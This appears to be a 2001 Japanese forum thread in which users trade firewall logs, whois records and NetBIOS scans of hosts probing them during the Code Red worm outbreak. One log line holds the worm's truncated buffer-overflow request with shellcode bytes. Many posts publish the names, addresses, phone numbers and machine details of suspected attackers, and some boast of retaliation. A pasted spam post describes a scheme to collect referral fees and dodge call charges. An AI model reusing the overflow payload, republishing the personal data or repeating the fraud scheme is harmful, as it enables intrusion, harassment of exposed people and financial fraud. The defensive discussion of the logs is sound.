p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:13:39:22 +0900] "GET /_vti_inf.html HTTP/1.1" 200 6649 "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:13:40:25 +0900] "GET /_vti_inf.html HTTP/1.1" 200 6649 "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"

HTTPステータスコードが２００なのは、抜いたIPを晒しているページが表示されるようにしているからです。

The firewall has blocked Internet access to your computer (NetBIOS Name) from 61.32.35.53 (NetBIOS Name).

inetnum: 61.32.35.0 - 61.32.35.127


netname: SANWON4006614D
descr: SANWON
descr: Business User in
descr: Doksan1-dong Keumcheon-gu SEOUL
country: KR
admin-c: JK262-AP
tech-c: DB50-AP
notify: [email protected]
mnt-by: MAINT-KR-DACOM
changed: [email protected] 20010628
source: APNIC

role: DACOM BORANET
address: DACOM Bldg., 706-1, Yoeksam-dong, Kangnam-ku, Seoul
phone: +82-2-6220-7755
fax-no: +82-2-6220-0312
e-mail: [email protected]
admin-c: SK91-AP
tech-c: TH45-AP
tech-c: CJS3-AP
tech-c: PHS1-AP
tech-c: WSH3-AP
tech-c: HEK1-AP
nic-hdl: DB50-AP
remarks: IP address administrator group of NIC team, DACOM Corp.
notify: [email protected]
mnt-by: MAINT-KR-DACOM
changed: [email protected] 20001106
source: APNIC

person: JONGKIL KIM
address: 333 23 Doksan1-dong Keumcheon-gu
address: SEOUL Korea
country: KR
phone: +82-31-618-1011
e-mail: [email protected]
nic-hdl: JK262-AP
mnt-by: MAINT-KR-DACOM
changed: [email protected] 20010628
source: APNIC

Hi! How are you?

I send you this file in order to have your advice

See you later. Thanks

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 130.153.0.0
b. [ネットワーク名] UEC-NET
f. [組織名] 電気通信大学
g. [Organization] The University of Electro-Communications
m. [運用責任者] YT1636JP
n. [技術連絡担当者] MT1953JP
n. [技術連絡担当者] MS2223JP
p. [ネームサーバ] ns.uec.ac.jp
p. [ネームサーバ] tweedledum.cc.uec.ac.jp
y. [通知アドレス] [email protected]
[割当年月日]
[返却年月日]
[最終更新] 1999/06/11 12:05:22 (JST)
[email protected]

IP: 211.219.50.177
Node: LINUX
NetBIOS: <0102>__MSBROWSE__<02>
Group: WORKGROUP

IP: 202.155.116.62
Node: WAHYU
Group: SALIM
NetBIOS: M. WAHYU SUJUDI
MAC: 00104B2657DA

ども。はじめまして♪
テレホンレディー（テレクラ、ツーショットのサクラ）をしてるりゅりゅといいます。

みなさんにいいこと教えてあげます。
このお仕事、友達が登録すると１人につき８千円〜１万円の紹介料がもらえます。
そんで男の人は料金後払いだと１０分〜６０分の無料体験サービスがあります。

そ・こ・で・提案♪
女の子は登録だけしてくれるだけでいいので私たちと紹介料を半分ずつにして
男の人は無料分だけかけたり、公衆電話からかけまくって、私たちの時給を半分ずつにしません？
そうそ、男の人は無料分を数千円オーバーしても追加料金なんか払うことないです。
何回か督促のTELがかかってきますけど、そんなの放っといて大丈夫です。
数千円で何度も督促してたら会社が費用倒れになっちゃいますからあきらめてくれます（笑）

あと、りゅりゅは、ネットレディー（出会いサイトのメールやチャットのサクラ）も募集してます。
こっちは、こういうとこに書くと危険なので、りゅりゅが講師(笑)でチャット説明会を開いてます♪

さぁて、嫌がらせ・文句のメールやBBSへのカキコは放置プレイにします。
いっときますけど、私も彼もパソコンにめっちゃ強いので、荒らし君はとっちめてあげます♪
タグ攻撃しかできないような人はやめておいた方がいいと思いますよ（笑）

↓からあなたの地域の人を探して連絡とってね♪　Last update 2001.07.08


りゅりゅのサイト。　ギブ＆テイク精神のない人はお断り！！
http://www6.plala.or.jp/Knock-off/

http://www.geocities.co.jp/PowderRoom-Rose/9498/
http://www5.ocn.ne.jp/~koisaku/text/tel/act0.html
http://www25.freeweb.ne.jp/feminine/luvaqua/
http://www.hello.co.jp/~nana77/
http://www.geocities.co.jp/PowderRoom-Tulip/2142/
http://www.geocities.co.jp/PowderRoom-Rose/5097/
http://www.asahi-net.or.jp/~vj6m-krhs/telele/
http://www35.tok2.com/home/MAYUKO/top.htm
http://www30.freeweb.ne.jp/feminine/saya327/
http://www.geocities.co.jp/PowderRoom/6276/
http://fry.to/mayupal/
http://dreamcity.gaiax.com/home/chocopie
http://www.geocities.co.jp/PowderRoom/8338/
http://www.geocities.co.jp/Bookend-Soseki/1164/index.html
http://www2.to/fps/
http://www.geocities.com/Nashville/Rodeo/6893/
http://village.infoweb.ne.jp/~love/yumi/index.htm
http://www11.freeweb.ne.jp/novel/yueni/

[Tcp/Ip:210.136.161.106]
[Brows:DoCoMo/1.0/P502i]

ＴＣＰ／ＩＰを再インスト

このスレの存在意義は何?

IP: 61.220.46.61
Node: ｾﾔｺ<F8>ｪAｾｹ
Group:
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 0050BA1DE628
DNS: 61-220-46-61.HINET-IP.hinet.net

今日は韓国から大量に飛んできていたけど、また何かイベントでも有ったのかな？

IP: 202.100.231.202
Node: D1101
Group: AAA
MAC: 005345000000
DNS: D1101

IP: 163.191.177.7
DNS: ioc-web-depts.ioc.state.il.us

IP: 24.179.94.121
DNS: c1193362-a.mckiny1.tx.home.com

IP: 141.155.44.229
Node: OEMCOMPUTER
Group: OEMWORKGROUP
NetBIOS: JASONAWILSON 
MAC: 444553540000

IP: 61.18.27.153
DNS: cm61-18-27-153.hkcable.com.hk
Node: XXX
Group: WORKGROUP
NetBIOS:
__MSBROWSE__

MAC: 00A00CC7FA70

IP: 217.230.110.188
DNS: pD9E66EBC.dip.t-dialin.net
Node: MASTER
Group: MASTER'S PLACE
NetBIOS: MASTER 
MAC: 444553540000

IP: 193.252.61.132
NetBIOS: INTERNAUT 
Node: DTP_INFO
Group: WORKGROUP
MAC: 444553547777
DNS: AFontenayssB-102-1-1-132.abo.wanadoo.fr

IP: 24.159.110.160
Node: GATEWAY
Group: PERSONAL
NetBIOS: GATEWAY 
MAC: 00036D1F8342
DNS: 24-159-110-160.hsacorp.net

IP: 193.252.61.132
NetBIOS: INTERNAUT 
Node: DTP_INFO
Group: WORKGROUP
MAC: 444553547777
DNS: AFontenayssB-102-1-1-132.abo.wanadoo.f

IP: 150.43.100.31
Node: EXPLORA&BRAIN
Group: 知能ロボット
NetBIOS: 知能ロボット 
MAC: 00909916CB10

IP: 62.57.49.71
Node: HPPAV
Group: HEWLETTPACKARD
NetBIOS: USUARIO AUTORIZ
MAC: 525400DAB569
DNS: docs50-71.menta.net

IP: 193.253.217.191
DNS: AMarseille-201-1-2-191.abo.wanadoo.fr
Node: LECAROUBIER
Group: PERSO
NetBIOS: LECAROUBIER 
MAC: 444553547777

IP: 64.228.192.52
Node: SEB
Group: WORKGROUP
NetBIOS: WORKGROUP 
MAC: 444553547777
DNS: HSE-Montreal-ppp137823.sympatico.ca

IP: 62.42.64.58
DNS: MS1-3A-u-0057.mc.onolab.com
Node: JCS
Group: SOL
NetBIOS: JCS 
MAC: 0048546AFCF7

皆さんにお聞きしたいのですが、先日不正アクセスがありました。
おうちで使っているのはノートンインターネットセキュリティーです。
アノソフトじゃそこまでわかりませんよね？
IPアドレスしか出てきてないので・・・
でも今まで5回以上あるのが怪しいと思ってます。
正体を暴きたいのですがどなたかアドバイスお願い致しますm(＿＿)m

>>189
http://www.mse.co.jp/ip_domain/
ですな。

>>190
ありがとうございます＜(__)＞
調べたら知らないプロバイダの名前が出てきました。
アタックされた時間とか調べて問い合わせれば捕まえる事って
出来るのでしょうか?
FW君に任せておいても問題ないんでしょうか?

先日アタックしてきた人のIP公開しま〜す。
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.167.240.0-210.167.246.0
b. [ネットワーク名] LUICE-NET
f. [組織名] るいすネット(株式会社るいす)
g. [Organization] LUICE-NET(RUISU Co.,Ltd)
m. [運用責任者] TS418JP
n. [技術連絡担当者] TS418JP
p. [ネームサーバ] av-l.luice.or.jp
p. [ネームサーバ] ns2.luice.or.jp
y. [通知アドレス] [email protected]
[割当年月日] 1998/01/23
[返却年月日]
[最終更新] 1998/02/20 10:33:16 (JST)
[email protected]

>>191
そんなもんフィルタして無視しとけって。
執拗なポートスキャンとか DoS 攻撃なら別だが。
一日数回程度のスキャンなんて、騒ぐほどのものじゃないと思うけど？

>>192了解＾＾
どこまでまずいのかって分からないもので＾＾；；
ありがとうございましたm(__)m

The firewall has blocked Internet access to your computer (ICMP Time Exceeded) from 129.250.4.1

Name: p4-7-3-0.r04.snjsca03.us.bb.verio.net
Address: 129.250.4.1

ルーター破ってきやがった。

＞１９４
そいつ強えな！
反撃技として、２ちゃんの各板にＩＰ晒しまくり！（和良

>>195
強いなとはどういうことですか？ルーターを破ったからですか？
上の情報から分かるんではないですよね？

traceroute

>>194
そのメッセージが何を意味しているかわかってますか？
無知でアタックだと騒ぐのは周囲に迷惑なので止めましょう。
>>197
routing loopとかも考えられ

IPには、生存時間(TTL：Time To Live)があります。
この値はルータを1つ経過するたびに1ずつ減らされ、0になるとIPデータグラムは破棄されます。
このときIPルータは、"ICMP Time Exceeded Message"を送信元に送り返し、パケットが破棄されたことを通知します。
IPに生存時間が決められているのは、経路情報にトラブルが発生して経路がループしているときなど、パケットが永久にネットワークを回り続けて麻痺状態になるこを防ぐためです。

IP: 63.197.54.27
Node: SHAWN
Group: LARSEN
NetBIOS: LARSEN 
MAC: 0050DA22FE08
DNS: adsl-63-197-54-27.dsl.lsan03.pacbell.net

BOなんか入ってねーよハゲ！

The firewall has blocked Internet access to your computer
(HTTP) from 61.205.216.21 (TCP Port 1323)

The firewall has blocked Internet access to your computer
(HTTP) from 61.13.57.27 (TCP Port 2317)

The firewall has blocked Internet access to your computer
(HTTP) from 61.160.138.250 (TCP Port 1906)

The firewall has blocked Internet access to your computer
(HTTP) from 61.142.165.51 (TCP Port 3081)

The firewall has blocked Internet access to your computer
(HTTP) from 61.117.46.96 (TCP Port 2697)

>>201-205
しつこいいいかげんにしろ

The firewall has blocked Internet access to your computer
(HTTP) from 61.218.3.197 (TCP Port 2477)

inetnum: 61.216.0.0 - 61.219.255.255
netname: HINET-TW
descr: CHTD, Chunghwa Telecom Co.,Ltd.
descr: Data-Bldg.6F, No.21, Sec.21, Hsin-Yi Rd.
descr: Taipei Taiwan 100

The firewall has blocked Internet access to your computer
(HTTP) from 61.131.167.223 (TCP Port 4321)

しょーもないよ（ﾜﾗ

DION (KDDI株式会社) (DION (KDDI CORPORATION))
SUBA-161-NGN [サブアロケーション] 210.196.95.0
株式会社新潟美人 (NIIGATABIJIN CORPORATION)
NIIGATABIJIN [210.196.95.160 <-> 210.196.95.175] 210.196.95.160/28

The firewall has blocked Internet access to your computer
(HTTP) from 61.73.238.6 (TCP Port 2711)

inetnum: 61.72.0.0 - 61.77.255.255
netname: KORNET
descr: KOREA TELECOM
descr: KOREA TELECOM Internet Operating Center
country: KR

The firewall has blocked Internet access to your computer
(HTTP) from 61.73.51.251 (TCP Port 4592)

>>しつこい
全部Code Redでしょ

　　　　　　　＼　　　　　　　／
　　　　 　　 ＿┌┬┬┬┐＿
　　　　―――┴┴┴┴┴―――――、
.　　 /. ￣￣￣//.￣￣| ||￣￣￣|||￣ |｜　　　 ＿＿＿＿＿＿＿＿＿＿
　　/.　 　　∧// ∧ ∧| || 　 　 　||| 　 |｜　　／
　[/＿＿__(ﾟ_//[ ].ﾟДﾟ,,) ||＿＿＿||| 　 |｜ ＜ 　>>しつこいを迎えに来ました
　||_.　*　 ＿|_|￣￣ ∪.|.|. 　 　 　 |ヽ. _|｜　　＼＿＿＿＿＿＿＿＿＿＿
　lO|o―o|O゜.|二二東京|精神病院　 　||
　| ∈口∋￣_l＿＿ｌ⌒ｌ_|＿＿＿__|_ｌ⌒ｌ_||
　　￣￣`ー'￣ 　　`ー'　　`ー'　 　`ー'

コードレッドか…勘弁してよ〜

>勘弁してよ〜

鯖立ててんの？

いやサーバー立ててないけどピコピコ点滅うざったいからねぇ。

今日も国内外の厨房君たちが大暴れ・・・うっとおしいったらありゃしない・・
IP: 211.112.159.18
NetBIOS: IS~SEE
Node: SEE
Group: L2ZONE
MAC: 0050BF15F71C
DNS: SEE
IP: 211.186.37.19
Node: PANKO-MOF63CLTU
Group: PANKO
NetBIOS: ADMINISTRATOR
MAC: 00C026F016E7
IP: 211.174.179.236
Node: NS
Group: MLIMITS
NetBIOS: INet~Services
MAC: 00D0B77D51B0

IP: 211.221.59.231
Node: KIMSUNGWOUK
Group: WORKGROUP
MAC: 444553547777
DNS: KIMSUNGWOUK

IP: 211.132.5.5
Node: JIKYOUWEB1
Group: WORKGROUP
NetBIOS: IS~JIKYOUWEB1
MAC: 00B0D0E1356E
DNS: JIKYOUWEB1

IP: 211.180.245.195
Node: FRONT
Group: ITTEAM
NetBIOS: IS~FRONT
MAC: 00010250B1A5
DNS: FRONT

その他諸々に・・・

そんなくだらないことを、わざわざ縦長コピペで
主張する君がうっとおしいったらありゃしない

ppp210164039149.nyuudani.nmt.ne.jp

ppp210164039149.nyuudani.nmt.ne.jp

ppp210164039149.nyuudani.nmt.ne.jp

133.205.140.251

どっちが厨房だか気づいてない所が厨房だ。

cj3147636-a.kkbnj1.kt.home.ne.jp

IP: 61.118.157.90
DNS: p3090-ip02souka.saitama.ocn.ne.jp

IP: 61.222.32.168
Node: GEOFF
Group: WORKGROUP
NetBIOS: ADMINISTRATOR
MAC: 0050BA0F87A9
DNS: 61-222-32-168.HINET-IP.hinet.net
ここ数日ひっきりなしに鳴り捲る。うざい。

あまりにもしつこいヤツがいたので、久しぶりに逆切れ攻撃してしまいました
こんな僕はいつまでたっても厨房と呼ばれ続けそうです…

Name: pl046.nas312.akita.nttpc.ne.jp
Address: 210.165.157.46

IP: 63.28.254.153
DNS: 1Cust153.tnt2.grapevine.tx.da.uu.net
------------------------------------------
IP: 61.74.223.253
Node: NS
Group: JOBNETWORK
NetBIOS: IS~NS
MAC: 0050BF436DE1
DNS: NS
------------------------------------------
IP: 61.217.55.188
DNS: 61-217-55-188.HINET-IP.hinet.net
Node: SHINRA2K
Group: WORKGROUP
MAC: 444553547777
------------------------------------------
IP: 61.10.229.253
Node: LINGNAN
Group: EVOLUTION
NetBIOS: IS~LINGNAN
MAC: 0050FCFE683B
DNS: cm61-10-229-253.hkcable.com.hk
-------------------------------------------
IP: 61.133.127.162
Node: ST-MNJHMG7WEI1N
Group: WORKGROUP
NetBIOS: IS~-MNJHMG7WEI1N
MAC: 00D0B75AA5F8
DNS: ST-MNJHMG7WEI1N
------------------------------------------
氏ね

こやつが何回もアタックかけてくるんですがどうしたらいいですか？
Reverse DNS Lookup of 61.124.252.108
The computer name ("domain name") identified for this IP address is:

ntthrsm008108.flets.ppp.infoweb.ne.jp

また来た！いい加減にしろ！

>>234
Code Red

>>234
CodeREDだってばさ。　それでも嫌ならinfowebに苦情言いな。

これってcode redなんですか？

The firewall has blocked Internet access to your computer (HTTP) from 61.121.57.35 (TCP Port 2253) [TCP Flags: S].

Time: 01/08/05 3:52:02

被った　ｽﾏｿ

どうも。荒らしが去るの待ちます

cj3136297-a.gunma1.kt.home.ne.jp IP: 203.165.230.223

cj3016509-a.nrima1.kt.home.ne.jp IP: 203.165.134.203

>>241
CODE RED
おまえがウザすぎ

>>242
なんでもコードレッドか？馬鹿の一つおぼえ＞242
痛すぎ

NTT-PCからとか（ＩＰサーチで）大文字アルファベットが多いね。
ＫＡＮＴＯＮなんてのもあったよ。
ちょっと感心した

>>243
開き直る前に調べて見ろよ

たしかに今日、NTT-PC系使用企業からのアクセス多い

今日、ほんと多いよ。うんざり。

ＺＡのAlertが５５回・・・
すげぇな

>245
開き直る？誰が　オ・マ・エだろそれ（プッ

210.103.159.242
なんか入力をもとめてくるけど・・・

IP: 61.115.209.29
Node: SERVER
NetBIOS: SERVER 
Group: LAN
MAC: 00402660E2E0
DNS: hcc3d73d11d.bai.ne.jp

>>249
とりあえず203.165.230.223は Microsoft-IIS/5.0 on Windows 2000.
の様だが？

61.217.109.52X3
61.121.22.56X3
61.121.252.222X3
140.128.85.5
61.121.105.161X3
61.121.252.222X3
61.121.77.115X3
61.221.238.61X3
（全ての最後に[http]がつきます）

１０時９分から１０時５０分までの間に
ノートンISのファイアーウォールログに表示されたものです。

オンラインしてる間は、ブロックログがびっちり出ています。

なぜ、３回づつなのか？
俺は何をされようとしているのか？
有害なことなのか無害なことなのか？

説明できる方いましたら教えてください。

61.131.141.75
203.104.182.139
203.104.131.36
k038148.ppp.dion.ne.jp

U−net インターネットサービス SURF (U-net Internet Service SURF)
SUBA-051-013 [サブアロケーション] 202.233.21.0
京成電鉄株式会社 (Keisei Electric Railway Co.,Ltd.)
KEISEI-NET [202.233.21.112 <-> 202.233.21.127] 202.233.21.112/28

203.239.143.120
194.182.105.30
203.104.182.175
203.104.180.204
203.197.190.10
211.115.65.139
203.239.6.162
203.252.18.81
210.132.105.195
203.244.13.206
203.246.94.89
203.253.161.101
203.104.183.218
203.253.15.156

61.136.9.32
61.117.53.228
61.117.44.138
61.117.102.23
61.74.100.219
61.13.193.219
61.117.52.152
61.120.108.5

>>257
自分のIPも61からはじまってるけど、今日はおとなしい。
まだ5回。

3d72fb9e.osaka.meta.ne.jp - - [05/Aug/2001:13:03:10 +0900] "GET /default.ida?X

カキコした途端にスキャン激しくなった。
誰かコードレッドに便乗してる奴いるんじゃないか？

昨日、今日と本当にポートスキャン多いんだけど
これもコードレッドの仕業なの？
サーバー立ててる人だけじゃないの？
被害くらうのって。

いちいち晒しても、きりが無い、
結構IISって使われているんだな。
CodeRedってマイクロソフトの市場調査じゃないの？
まったく。

The firewall has blocked Internet access to your computer (HTTP) from 61.167.36.213 (TCP Port 1885).

p5163-ipad03maru.tokyo.ocn.ne.jp - - [05/Aug/2001:14:28:28 +0900] "GET /default.ida?XX

>>261
おそらく韓国のせい。日本サイトを8/4に攻撃しようとネットで呼びかけている。

http://korea.hanmir.com/ktj.cgi?url=http://column.daum.net/Column-bin/Bbs.cgi/forjapanrbs/qry/zka/B23qD2-l/qqatt/^

3d72f91c.osaka.meta.ne.jp - - [05/Aug/2001:14:47:50 +0900] "GET /default.ida?X
3d72f3a2.osaka.meta.ne.jp - - [05/Aug/2001:14:48:03 +0900] "GET /default.ida?X

z61-205-219-4.dialup.wakwak.ne.jp - - [05/Aug/2001:14:53:05 +0900] "GET /default.ida?X

203.239.143.120
203.229.217.38
203.53.80.66
202.60.224.104
203.104.132.202
108.180.104.230
203.104.181.119

210.224.164.185 - - [05/Aug/2001:05:19:33 +0900] "XXXXXX

これは？？

h199131.ppp.asahi-net.or.jp - - [05/Aug/2001:15:19:01 +0900] "GET /default.ida?X

pc12126.ict.ne.jp - - [05/Aug/2001:15:40:34 +0900] "GET /default.ida?X

h199131.ppp.asahi-net.or.jp - - [05/Aug/2001:15:56:40 +0900] "GET /default.ida?XX

さっきからBlackICEが反応しすぎだよ。
61.124.217.19
61.124.50.123
61.124.41.43
61.124.56.134
61.124.186.47
61.124.73.56

IP: 61.118.154.244
Node: PHASE-032J30T50
Group: WORKGROUP
MAC: 444553547777
DNS: p7244-ipad02maru.tokyo.ocn.ne.jp

いったいなんなんだ。
今日は朝からＰＣ立ち上げて
今になるまで１分おきに侵入しようとしてるぞ。
俺の３年のＰＣ歴のなかでも、こんな日は初めてだ。
おかげで接続がぷつぷつとよく切断される。
ＦＷソフトいれてなかったと思うとぞうっとするよ。
今日は何かあったのか？

周りのスレに目を通してから発言せよ

CodeRedは Web Server の脆弱性に対する攻撃なので、
ＦＷを入れていても、Web Server を公開している場合
は感染します。

>ＦＷを入れていても、Web Server を公開している場合
FWを入れていても、Web ServerがIISであって、公開している場合

パッチ当ててれば平気だけどな

>> 278
訂正さんくす

>> 279
MSのパッチ、信用出来るんすか？

まあ、信じるしかないか。

194.182.105.30
210.132.105.195
211.115.65.139
203.145.131.103
203.239.143.120
203.104.183.218

61.13.*.*
61.127.*.*
多すぎです(;´Д｀)

>>282
おれも61.〜ってのが多い。61.〜ってどこなの？

>>282-283は自分のIPも61から始まってるだろ

63.62.84.157
216.175.69.192
203.232.165.251
203.104.183.193
203.250.143.83
203.73.118.145
203.253.15.156
203.104.182.175
203.244.13.206
203.104.180.204
203.197.190.10
203.239.6.162
203.246.94.89
203.253.161.101
203.252.18.81

IP Address List HostName Aliases
211. 74.131.106 swtp131-106.adsl.seed.net.tw
twってどこね？

台湾

203. 70.231.134　　mail.kiss.com.tw

port:111,TCP (flags:S)

これも結構しつこい・・・ホスト名が気になる・・・

202.30.145.8

>>284
本当だ。これって、つまり、どういうこと？

>>290
もしかして、JCOMですか？ぼくJCOMです。

>>290
君はわざと狙ってるんだよなｗ

本当にどさくさに紛れてスキャンかけてくるやつ
うじゃうじゃいるね。

同じプロバ、同じ市のやつから80にスキャンが・・なんだか(;´Д`)

今日TAのランプが点滅しっぱなしなんだけど
ぞぬは防いでくれとるんかな。心配よ

最近、アパッチのログ見てたら次のようなものをよく目にします。
errorログの方を見ると、malformed headerとなっています。
やっぱ不正アクセスなのでしょうか？？？

210.90.238.146 - - [05/Aug/2001:19:11:14 +0900] "GET /default.ida?NNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u
531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 334

>>296
code redだよ。

>>296
管理者として痛すぎるぞ・・・

>>297
Thanks!早速、コードレッド用のスレ見てみますわ

IP: 165.76.23.180
DNS: 165.pool6.tokyo.att.ne.jp

IP: 165.76.105.146
Node: YOQICREA-1KSL2B
Group: WORKGROUP
MAC: 444553547777
DNS: 146.pool10.dsltokyo.att.ne.jp

IP: 165.76.186.158
DNS: 158.pool0.dslfukuoka.att.ne.jp
Node: ZIPPO
Group: WORKGROUP
MAC: 444553547777

IP: 165.76.82.162
DNS: 35.gate2.atsugi.attmil.ne.jp

IP: 165.76.44.158
DNS: 158.pool6.ipctokyo.att.ne.jp

IP: 212.77.208.145
Node: RCDOHAEXCH
Group: RITZCARLTON
NetBIOS: ADMINISTRATOR
MAC: 0010B5DE4D1F

IP: 165.76.227.237
DNS: 222.pool22.tokyo.att.ne.jp

ふう。今日だけで50件近く…。俺なんかしたかな？

IP: 165.76.172.120
DNS: 120.pool5.dsltokyo.att.ne.jp
Node: J-I-2
Group: JINET1
MAC: 444553547777

IP: 165.76.190.126
DNS: 126.pool8.dsltokyo.att.ne.jp
Node: DICE
Group: WORKGROUP
MAC: 444553547777

この頃ＺＡのアラーム鳴りっぱなし・・・
串刺したほうが良いのかな・・




逝ってきます。

>>307
コードレッドのスレ見れ

この方今こられた
IP: 61.207.95.157
DNS: p3157-ipad03maru.tokyo.ocn.ne.jp
Node: ZOL
NetBIOS: WORKGROUP 
Group: WORKGROUP
MAC: 444553547777

この方も
IP: 61.180.64.149
Node: KEXUN-SV
Group: WORKGROUP
NetBIOS: IS~KEXUN-SV
MAC: 5254AB1097A7
DNS: KEXUN-SV

今日は晒していったらキリないよ。

あなたが検索されたアドレス［ 210.232.153.98 ］のJPNICからの応答は以下の通りです。

オープンコンピュータネットワーク (Open Computer Network)
SUBA-131-F52 [サブアロケーション] 210.232.153.0
hoek net(有限会社シティライフニュー) (hoek net(CITY LIFE NEW Ltd.))
HOEK-NET [210.232.153.96 <-> 210.232.153.111] 210.232.153.96/28

あなたが検索されたアドレス［ 210.172.182.126 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.172.128.0-210.172.191.0
b. [ネットワーク名] INTERQ
f. [組織名] インターキュー株式会社
g. [Organization] interQ inc.
m. [運用責任者] TW184JP
n. [技術連絡担当者] KY642JP
p. [ネームサーバ] dns.interq.or.jp
p. [ネームサーバ] dns1.interq.or.jp
p. [ネームサーバ] dns2.interq.or.jp
y. [通知アドレス]
[割当年月日] 1997/11/06
[返却年月日]
[最終更新] 1997/12/24 19:22:19 (JST)
[email protected]

InfoSphere (株式会社NTTPCコミュニケーションズ) (InfoSphere (NTT PC Communications, Inc.))
SUBA-029-229 [サブアロケーション] 202.224.208.0
ボードネットワークス (Board Networks)
BOARD-NET [202.224.208.64 <-> 202.224.208.71] 202.224.208.64/29

あなたが検索されたアドレス［ 210.232.197.61 ］のJPNICからの応答は以下の通りです。

オープンコンピュータネットワーク (Open Computer Network)
SUBA-131-F97 [サブアロケーション] 210.232.197.0
那須インターネットサービス (Nasu Internet Service)
NAS-INET [210.232.197.48 <-> 210.232.197.63] 210.232.197.48/28

202.187. 29. 20 server3.sepakat.com.my
ﾔﾗﾚﾃﾙﾅ…

あなたが検索されたアドレス［ 210.232.166.2 ］のJPNICからの応答は以下の通りです。

エムケー精工株式会社 (MK SEIKO CO.,LTD.)
MKSEIKO-NET [210.232.166.0 <-> 210.232.166.15] 210.232.166.0/28
オープンコンピュータネットワーク (Open Computer Network)
SUBA-131-F65 [サブアロケーション] 210.232.166.0

本日
168.180.218.53
202.30.218.98
210.103.140.2
210.110.31.241
210.111.142.41
210.111.5.80
210.113.183.50
210.117.186.149
210.12.28.65
210.166.102.214
210.166.114.36
210.166.18.104
210.166.19.66
210.166.201.233
210.166.238.195
210.166.87.28
210.182.108.60
210.196.64.130
210.20.55.149
210.207.198.173
210.216.39.252
210.236.4.140
210.243.84.202
210.253.213.97
210.58.3.144
210.64.217.10
210.65.74.110
210.66.156.2
210.79.234.159
210.85.185.110
210.85.41.16
210.85.93.162
210.91.196.69
210.99.21.169

昨日も多かった

隣のスレ見て納得

203.104.150.58
203.104.152.245
203.253.21.170
203.65.197.117
203.104.168.59
212.98.162.250
211.135.178.232
203.245.9.218

うちもHINET-IP.hinet.netからいっぱい来た・・他にも台湾からたくさん。

さて。寝るか。

WWW.EDUTAINTV.COM
211.119.134.46

４０回もクソを投げてよこした、お馬鹿ンコク。

全部 Code Red II のXXXX系です
61.114.206.143 / 61.114.206.16 / 61.114.251.158 / 61.131.118.150 / 61.158.144.74 /
61.182.251.213 / 61.218.150.237 / 61.220.243.114 / 61.43.231.126 / 61.75.49.169 /
61.77.211.12 / 61.79.135.28 / 211.10.2.242 / 211.10.2.242 / 211.10.5.69 /
211.104.116.170 / 211.104.23.35 / 211.112.126.223 / 211.113.75.100 / 211.115.216.67 /
211.115.216.67 / 211.115.216.67 / 211.115.216.67 / 211.115.216.67 / 211.115.216.67 /
211.115.216.67 / 211.115.216.67 / 211.115.216.67 / 211.115.73.101 / 211.152.232.212 /
211.170.69.227 / 211.172.213.242 / 211.188.137.88 / 211.201.70.116 / 211.204.90.99 /
211.216.183.253 / 211.219.101.81 / 211.219.20.123 / 211.219.234.157 / 211.219.98.163 /
211.22.125.2 / 211.225.35.176 / 211.227.62.214 / 211.23.69.155 / 211.230.128.15 /
211.232.159.70 / 211.35.145.207 / 211.38.189.125 / 211.38.70.170 / 211.39.5.1 /
211.54.86.139 / 211.55.55.43 / 211.57.244.35 / 211.62.59.51 / 211.73.207.83 /

IP: 211.36.239.227
Node: ﾃﾖｽﾂｰﾇ
Group: WORKGROUP
NetBIOS: IS~ﾃﾖｽﾂｰﾇ
MAC: 00104B1BDCB2
DNS: ﾃﾖｽﾂｰﾇ
たまに文字化けしたようなのがくる。

http://whois.nic.ad.jp/cgi-bin/whois_gw?key=210.226.6.64/27

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.226.6.64/27
b. [ネットワーク名] CBN2001
f. [組織名] 株式会社ユー・エス・エスカーバンクネット
g. [Organization] USS Car Bank Net Corporation
m. [運用責任者] TN4737JP
n. [技術連絡担当者] TN4737JP
y. [通知アドレス]
[割当年月日] 2000/11/27
[返却年月日]
[最終更新] 2000/11/27 09:42:13 (JST)
[email protected]

210.226.6.72 から 210.226.6.74 のIPで
かなり長期間にわたってアクセス来てます
困ったもんだ

http://210.226.6.72
http://210.226.6.73
http://210.226.6.74

202.223.143.52
学術情報センター (National Center for Science Information Systems)
SUBA-012-SIN [サブアロケーション] 202.223.143.0
佐賀短期大学 (Saga Junior College)
SAGA-JC-NET [202.223.143.48 <-> 202.223.143.63] 202.223.143.48/28

202.223.143.51
学術情報センター (National Center for Science Information Systems)
SUBA-012-SIN [サブアロケーション] 202.223.143.0
佐賀短期大学 (Saga Junior College)
SAGA-JC-NET [202.223.143.48 <-> 202.223.143.63] 202.223.143.48/28

202.116.130.139/202.151.232.77/202.166.252.58/62.226.40.243
/202.188.231.172/61.32.10.162/61.147.16.10/61.74.144.159
/61.129.98.59/61.139.111.192/61.10.67.149/61.216.71.193
/212.37.33.141/202.102.230.210/202.105.167.65/202.207.146.50
/202.98.82.66/202.110.140.203

IP Address : 211.115.217.142
Network Name : GNG-IDC-MPLUSTECH
Connect ISP Name : GNGIDC
Connect Date : 20010212
Registration Date : 20010625
Name : Jeaik Lee
Org Name : mPlusTech
State : KYONGGI
Address : 1428-2 Gyanyang-1Dong Dongan-Gu Anyang-Si
Zip Code : 431-061
Phone : +82-2-2105-6267
Fax : +82-2-3773-8113
E-Mail : [email protected]

こいつも３０回ほど連続で来た！
ことごとくカンコックだなあ。

IP: 211.198.54.186
Node: ｿﾃｻｩｹﾌ1ﾈ｣
Group: ｿﾃｻｩｹﾌ<B1>ｺｴﾜ
